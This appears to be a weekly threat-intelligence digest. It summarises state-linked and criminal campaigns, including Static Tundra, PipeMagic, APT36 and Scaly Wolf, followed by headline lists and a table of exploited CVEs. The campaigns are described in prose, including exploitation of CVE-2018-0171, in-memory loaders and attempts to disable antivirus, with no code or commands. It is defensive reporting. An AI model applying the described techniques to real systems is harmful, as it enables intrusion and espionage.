Skip to main content Skip to footer 
Static Tundra espionage campaign targets end-of-life Cisco networking devices
Cisco Talos researchers observed the Russian-state sponsored threat actor Static Tundra targeting unpatched Cisco IOS and Cisco IOS EX software for long-term espionage and to extract device configuration information. The group has been exploiting a critical remote code execution flaw, tracked as CVE-2018-0171, in the Smart Install feature of the devices since at least 2021. Organizations in the telecommunications, higher education, and manufacturing sectors across North America, Asia, Africa, and Europe have been targeted. Static Tundra leverages bespoke tooling to automate exploitation and configuration against target IP addresses, which are identified using services like Shodan or Censys. Once access is achieved, the group spoofs SNMP traffic source addresses to obfuscate infrastructure and bypass access control lists, and deploys the SYNful Knock Cisco IOS firmware implant to maintain persistence. They establish generic routing encapsulation tunnels to redirect traffic of interest, while exfiltrating NetFlow data through various means, including inbound TFTP connections. A Federal Bureau of Investigation advisory also warns that actors linked to the Russian Federal Security Service’s Center 16 are exploiting CVE-2018-0171 against critical infrastructure. Patches for CVE-2018-0171 are available.
Modular PipeMagic backdoor leveraged in Storm-2460 and Middle East ransomware attacks
Microsoft researchers analyzed PipeMagic, a modular backdoor that has been used by Storm-2460 in attacks against the United States, Europe, South America, and Middle East. The malware can dynamically execute payloads, with its modular structure granting the attackers control over code execution and making detection and analysis more challenging. PipeMagic has been observed being dropped and executed in memory via a malicious MSBuild downloaded using the certutil utility. The attackers then exploited a then-zero-day vulnerability, tracked as CVE-2025-29824, in Windows Common Log File System, and ultimately deployed ransomware. PipeMagic communicates with its C2 server via TCP and receives its payload modules via a series of doubly linked lists for staging, execution, and communication purposes. Kaspersky researchers also observed PipeMagic being delivered to Middle Eastern organizations in October 2024 under the guise of ChatGPT client applications, with new infections also observed in Saudi Arabia and Brazil in January 2025. The 2025 variants of PipeMagic contain improved persistence and lateral movement mechanisms, and have been delivered via a Microsoft Help Index File and DLL hijacking.
Phishing campaign targets Indian Android users with government electricity subsidiary lures
McAfee researchers discovered an ongoing Android phishing campaign targeting Indian users by impersonating a government electricity subsidiary service. The campaign aims to lure victims into installing a malicious app that not only steals financial information, but also steals text messages, sends smishing messages to the user’s contacts, and leverages Firebase as a C2 channel. The attack begins with a promotional YouTube video claiming users can receive government electricity subsidiaries through a mobile app. The video includes a shortened URL that redirects to a phishing site hosted on GitHub, which is designed to mimic an official Indian government portal and features a Google Play icon. Victims are guided through a fake registration process, where downloading the supposed app first installs a legitimate APK named PMBY, which in turn installs a malware APK named PMMBY under the guise of a security update. Upon installation, the PMMBY application requests aggressive permissions and displays a fake electricity provider selection screen. Users are then prompted to complete a fake registration form and complete a payment, ultimately leading to the theft of their sensitive and financial information.
APT36 targets Indian government and defense entities in espionage campaign
In August 2025, CloudSEK researchers observed the Pakistan-linked advanced persistent threat group APT36 launching a new cyberespionage campaign against Indian government and defense entities. APT36 leveraged phishing ZIP files containing malicious Linux ‘.desktop’ shortcuts, disguised as a PDF document, to download dropper payloads from Google Drive. The malware decodes the hex payload and adjusts permissions before executing the dropper binary. It then opens a decoy PDF file in Firefox, while the dropper performs several actions, including executing anti-debugging and anti-sandbox checks, establishing persistence on the infected system, and attempting to connect to its C2 server via WebSocket.
Scaly Wolf targets Russian engineering company with Updatar and Meterpreter backdoors
Doctor Web researchers detailed a targeted cyberattack against a Russian engineering enterprise that took place between May and June 2025. The attackers used phishing emails using finance-themed lures and containing either a decoy PDF or ZIP archive to deliver malicious executables. Among the delivered malware were the custom modular Updatar trojan and Meterpreter backdoor, alongside various open-source tools. Updatar was used for file theft, with persistence achieved via BITS tasks used to deliver Meterpreter. The open-source tools included Chisel and FRP for tunneling, the HandleKatz credential dumping utility, and remote administration software like RDP Wrapper and RemCom. The attackers used RockYou Obfuscation to hinder analysis of its Updatar samples, while also attempting to disable Windows Defender and Dr.Web protections via PowerShell commands and registry edits. The campaign has been attributed to the advanced persistent threat actor, Scaly Wolf. The researchers identified infrastructure and code overlaps linking the Updatar modules and supporting malware to a Scaly Wolf operation that targeted the same company in 2023. The more recent attack indicates a shift away from using malware-as-a-service for initial access.
Ransomware
Europol Says Qilin Ransomware Reward FakeSecurityWeek RSS Feed – Aug 21 2025Warlock: From SharePoint Vulnerability Exploit to Enterprise RansomwareTrend Micro – Aug 20 2025Pakistani Oil and Gas Sector Under Attack from Blue Locker RansomwareSC Magazine UK – Aug 19 2025The State of Ransomware in Retail 2025Sophos – Aug 19 2025US Seizes $2.8 Million From Zeppelin Ransomware OperatorSecurityWeek RSS Feed – Aug 18 2025This ‘SAP Ariba Quote’ Isn’t What It Seems—It’s RansomwareCofense – Aug 14 2025
Financial Services
GodRAT – New RAT targeting financial institutionsKaspersky Lab – Aug 19 2025Someone’s poking the bear with infostealers targeting Russian crypto developersThe Register – Security – Aug 18 2025ERMAC V3.0 Banking Trojan Source Code Leak Exposes Full Malware InfrastructureThe Hacker News – Aug 16 2025Lazarus Stealer : Android Malware for Russian Bank Credential Theft Through Overlay and SMS Manipulation CYFIRMA – Aug 16 2025PhantomCard: New NFC-driven Android malware emerging in Brazil 🇧🇷Threat Fabric Blog – Aug 14 2025
Geopolitics
Russian Hacktivists Take Aim at Polish Power Plant, AgainDark Reading – Aug 19 2025Security Exclusive: DDoS hacktivists pressure Australia to boycott IsraelCyber Daily – Aug 19 2025XenoRAT malware campaign hits multiple embassies in South KoreaBleeping Computer – Aug 18 2025UAT-7237 targets Taiwanese web hosting infrastructureTalos Intelligence Blog – Aug 15 2025Cybersecurity in Focus: Recent Threats Targeting India Amid Independence Day Celebrations CloudSEK Blog – Aug 14 2025
High Priority Vulnerabilities
| Name | Software | Base Score | Temp Score | |
|---|---|---|---|---|
| CVE-2025-43300 | iPadOS | 6.3 | 6.0 | |
| Related: Actively exploited zero-day fixed in Apple iOS and iPadOS products | ||||
| CVE-2025-8671 | HTTP2 | 7.5 | 7.2 | |
| Related: HTTP/2 MadeYouReset flaw enables DoS attacks | ||||
| CVE-2023-46604 | Enterprise Data Quality | 9.8 | 9.8 | |
| Related: Patching for persistence: How DripDropper Linux malware moves through the cloud | ||||
| CVE-2025-54948 | Apex One | 9.8 | 9.4 | |
| Related: U.S. CISA adds Trend Micro Apex One flaw to its Known Exploited Vulnerabilities catalog | ||||
| CVE-2025-47227 | ScriptCase | 7.5 | 5.1 | |
| Related: ScriptCase vulnerabilities can be chained for pre-authenticated remote command execution | ||||